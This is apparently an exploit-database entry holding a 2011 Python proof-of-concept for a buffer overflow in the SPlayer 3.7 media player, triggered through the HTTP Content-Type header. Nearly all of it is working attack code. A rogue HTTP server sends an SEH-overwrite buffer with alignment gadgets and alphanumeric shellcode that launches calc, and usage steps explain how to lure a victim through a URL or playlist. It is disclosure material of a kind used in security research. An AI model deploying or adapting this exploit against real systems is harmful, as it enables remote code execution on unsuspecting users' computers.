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SPlayer 3.7 Buffer Overflow

🗓️ 05 May 2011 00:00:00Reported by xsploited SecurityType 
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SPlayer 3.7 Buffer Overflow Vulnerability in Content-Type Fiel

Code
`#!/usr/bin/python  
# Exploit Title: SPlayer <= 3.7 (build 2055) Buffer Overflow Exploit  
# Date: May 04, 2011  
# Author: xsploitedsec <xsploitedsecurity [at] gmail [dot] com>  
# Software Link: http://www.splayer.org/index.en.html  
# Versions: <= 3.7 (build 2055)  
# Tested On: WinXP SP3 Eng / SPlayer 3.7 build 2055 (English Locale)  
# CVE: N/A  
  
# Software Descripton:  
# "SPlayer is a simple and free high performance all-in-one audio and video player that was designed  
# in order to help you easily view your videos, images and listen to your music files. SPlayer lets  
# you enjoy your favorite music and movies"  
  
# Vulnerability information:  
# SPlayer is vulnerable to a remote buffer overflow when parsing a specially crafted HTTP header from  
# a remote server. The bug is triggered due to the "Content-Type:" field being passed to the wcstol()  
# function, prior to any bounds checking. This could allow an attacker to trick a remote user into  
# opening a specially crafted playlist file, containing a URL pointing to a malicious web server.  
  
# Usage:  
  
# Method 1:  
# 1. Execute this script ...  
# 2. Launch SPlayer, right click and click open->URL (ctrl+u) ...  
# 3. Input the server URL and Click OK ...  
# 4. Boom!/calc ...  
  
# Method 2:  
# 1. Execute this script ...  
# 2. Launch SPlayer and click Open (ctrl+o) ...  
# 3. Browse to any playlist file (m3u, pls) It must contain the server URL! ...  
# 4. Click Open ...  
# 5. [wait til URL is loaded], Boom!/calc ...  
  
# URL Examples:  
# http://serverip/anyfilename.avi  
# http://serverip:port/anyfilename.avi  
# http://serverip/*  
  
# Shouts:  
# edb-team, corelanc0d3r/corelan-team, kaotix, sheep, deca, nemesis  
  
import sys  
import socket  
  
bindaddr = "0.0.0.0"  
bindport = 1234  
banner = "Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1"  
  
# calc shellcode / alpha_upper  
calcshell = ( # Plenty of room for lots of shellcode here  
"PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAP"  
"AZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB3Y9R8Z9L8Y2RJT1N0V0Y0I0I0I0I0"  
"I0I0I0I0I0I0C0C0C0C0C0C070Q0Z1Z110X0P001100112K11110Q02110B020B0B000B0B110B0X0P0"  
"8110B2U0J0I0I2L0M080N1Y0E0P0G2P0C000Q2P0K090K0U0E1Q0H0R0B0D0L0K0B2R0P000L0K0F020"  
"F2L0L0K0C1R0G1T0N2K0Q1R0D1X0D0O0L2W0C2Z0E2V0E1Q0I2O0F0Q0K2P0L2L0E2L0Q2Q0C0L0E0R0"  
"D2L0G0P0O010J2O0D0M0G2Q0K2W0I2R0H2P0P0R0C1W0N2K0B2R0B000L0K0P0B0G0L0G2Q0H0P0N2K0"  
"C2P0Q1X0K050K2P0P2T0Q0Z0E0Q0H0P0B2P0N2K0C2X0F2X0L0K0B2X0E2P0E0Q0N030I2S0G0L0P0I0"  
"N2K0G0D0N2K0F1Q0I0F0P010I2O0E1Q0O000L2L0J1Q0H0O0F2M0C010O070G0H0K0P0B0U0L040E0S0"  
"C0M0K0H0E2K0Q2M0Q040P2U0K0R0P0X0N2K0F080G0T0C010I0C0E060N2K0F2L0B2K0N2K0B2X0G2L0"  
"C010K1S0N2K0G2T0L0K0C010H0P0L0I0Q0T0D1T0E2T0C2K0C2K0P1Q0B2Y0P0Z0P0Q0I2O0K0P0C1X0"  
"C2O0C1Z0N2K0F2R0H2K0L0F0C2M0B0J0E0Q0N2M0N1U0O0I0G2P0C000E0P0B2P0Q2X0P010N2K0P2O0"  
"O2W0K0O0J2U0M2K0J0P0N0U0I020F060E080N0F0L0U0O0M0M0M0K0O0I0E0E2L0F1V0Q2L0F1Z0M0P0"  
"K0K0M000Q1U0G2U0O0K0P0G0D0S0Q1R0P2O0P1Z0C000Q0C0K0O0J2U0E030C0Q0P2L0E030D2N0B0E0"  
"D080Q2U0C000E0Z1111KPA")  
  
class Client():  
  
def about(self):  
about = "\r=======================================================================\n"  
about += " PoC Title: Exploit Title: SPlayer <= 3.7 (build 2055) Buffer Overflow\n"  
about += " Author: xsploitedsec <xsploitedsecurity [at] gmail [dot] com>\r\n"  
about += "======================================================================="  
print about  
  
def run (self):  
pre = "HTTP/1.1 200 OK\r\n"  
pre += "Date: Tue, 03 May 2011 04:18:38 GMT\r\n"  
pre += "Server: " + banner + "\r\n"  
pre += "Last-Modified: Sun, 03 Jul 2005 18:39:44 GMT\r\n"  
pre += "ETag: ""1f3814d-e6800-3fb032cba1c00""\r\n"  
pre += "Accept-Ranges: bytes\r\n"  
pre += "Content-Length: 99999\r\n"  
pre += "Connection: close\r\n"  
pre += "Content-Type: "  
  
#Begin evil buffer  
evil = "\x41" * 2073  
evil += "\x61\x73" #popad/nop align  
  
evil += "\x25\x73" #SE handler - ppr/splayer.exe [0x00730025]  
  
#Close the blinds  
evil += "\x73" #nop/align  
evil += "\x55" #push ebp  
evil += "\x73" #nop/align  
evil += "\x58" #pop eax  
evil += "\x73" #nop/align  
  
#Align to EAX/execute shellcode  
evil += "\x05\x19\x11" #add eax, 0x11001900  
evil += "\x73" #nop/align  
evil += "\x2d\x11\x11" #sub eax, 0x11001100  
evil += "\x73" #nop/align  
evil += "\x50" #push eax  
evil += "\x73" #nop/align  
evil += "\xc3" #ret  
  
evil += "\x46" * 1004 #align shellcode->EAX  
#End evil buffer  
  
padding = "\x44" * (30000 - len(pre + evil + calcshell)) + "\r\n"  
payload = pre + evil + calcshell + padding  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.bind((bindaddr, bindport))  
s.listen(5)  
print "[+] Listening for incoming connections on port: %d" % bindport + " ..."  
except:  
print "[!] Error binding socket, is the port already in use?\r\n[-] Exiting"  
sys.exit()  
  
# Note: SPlayer seems to connect/send a GET request twice every time a URL is processed  
# and it crashes after the second request  
  
while 1:  
(clientsock, address) = s.accept()  
print "[*] New connection from", address[0]  
clientsock.recv(1024)  
sent = clientsock.send(payload)  
print "[+] Payload sent successfully [size: %d bytes]" % sent  
sent = 0  
print "[-] Closing connection to", address[0]  
clientsock.close()  
  
if __name__ == "__main__":  
Client().about()  
Client().run()  
  
`

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